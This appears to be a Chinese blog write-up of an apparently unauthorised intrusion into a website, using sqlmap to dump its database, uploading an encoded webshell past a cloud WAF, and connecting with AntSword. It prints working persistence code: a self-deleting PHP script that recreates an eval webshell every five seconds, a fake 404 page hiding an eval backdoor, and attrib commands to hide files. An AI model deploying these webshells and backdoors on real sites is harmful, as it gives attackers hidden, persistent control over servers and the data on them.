【writeup】某站一次简单的渗透GetShell
前言
信息搜集
可以利用网络上强大的搜索引擎,或者Google hacking进行关键字搜索特定目标站点,这个以后单独开一篇。
SQLmap测试
存在注入点,但是不要慌,看看能不能绕过
绕过成功!
外网入口利用
外网入口利用的办法有很多,这里我只阐述数据库注入,目标站点还有XSS漏洞getwebshell,不再阐述。
在本次渗透中,利用数据库注入点漏洞进行获取数据库有效信息,进而getwebshell
查询当前数据库
# sqlmap -u "xxxxx.com/xxxx.php?id=1" --current-db查询当前数据库用户
# sqlmap -u "xxxxx.com/xxxx.php?id=1" --current-user查询是否当前数据库是管理员用户
# sqlmap -u "xxxxx.com/xxxx.php?id=1" --is-dba查询数据库用户角色
# sqlmap -u "xxxxx.com/xxxx.php?id=1" --roles查询所有数据库
# sqlmap -u "xxxxx.com/xxxx.php?id=1" --dbs爆表
# sqlmap -u "xxxxx.com/xxxx.php?id=1" -D XX --tables爆字段
# sqlmap -u "xxxxx.com/xxxx.php?id=1" -D XX -T --columns爆数据
# sqlmap -u "xxxxx.com/xxxx.php?id=1" -D XX -T -C XXX --dump登录后台
尝试文件上传
被拦截,谷歌了一下,imunify360 云waf,国外一个比较大型的安全厂商,我利用bp抓包,截断,文件包含,中间件解析,PHP CGI解析均被拦截,那么这个编辑器漏洞可能无法利用了。
发现意外上传点
在后台product栏目有个文件上传漏洞,这是原站上传pdf文件资料下载点,尝试base64加密传一句话利用蚁剑流量混淆加密传输成功绕过。
连接蚁剑
终端测试
权限太低了,除root账户外,几乎都没有任何账户能够登陆ssh和执行shell命令。
意外之喜
发现大佬已经光顾过这个站点,还留下了后门和大马,尝试bp爆破。
权限提升与维持
提权
利用Linux内核进行提权,但是以往的内核提权服务器容易崩溃,所以没有尝试。
权限维持
在getshell后,往往因为内网渗透的需要不得不长时间对目标进行持续威胁(简称APT),因此需要进行权限维持,隐藏后门。
隐藏文件
attrib +s +h xxx.php //隐藏xxx.php文件
attrib命令 用于修改文件属性
+s 设置系统文件属性
+h 设置隐藏属性在文件夹下无法看到xxx.php,但仍然可以访问
不死马
<?php
set_time_limit(0);//程序执行时间
ignore_user_abort(1);//关掉终端后脚本仍然运行
unlink(__FILE__);//文件完整名
while(1){
file_put_contents('xxx.php','<?php $a=array($_REQUEST["xxx"]=>"3");
$b=array_keys($a)[0];
eval($b);?>');
sleep(5);
}
?>该脚本每5秒向服务器创建xxx.php,并写入一句话免杀木马,结合attrib命令隐藏文件更好地建立后门。
404页面隐藏后门
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
function func(){
return @$_REQUEST["xxx"];
}
preg_replace("/xxx/e",func(),"i am xxx");
header('HTTP/1.1 404 Not Found');
?>因为目标站点为Linux服务器,所以只列出了几个,windows的权限维持还可以利用.user.ini文件构成的PHP后门、建立影子账户、metasploit权限维持、shift后门、远程桌面会话劫持等方法,以后遇到了再说
「一键投喂 软糖/蛋糕/布丁/牛奶/冰阔乐!」
(๑>ڡ<)☆谢谢老板们的投食~
使用微信扫描二维码完成支付
豫ICP备16039367号-1
本站由阿里云计算提供全球加速
仅有一条评论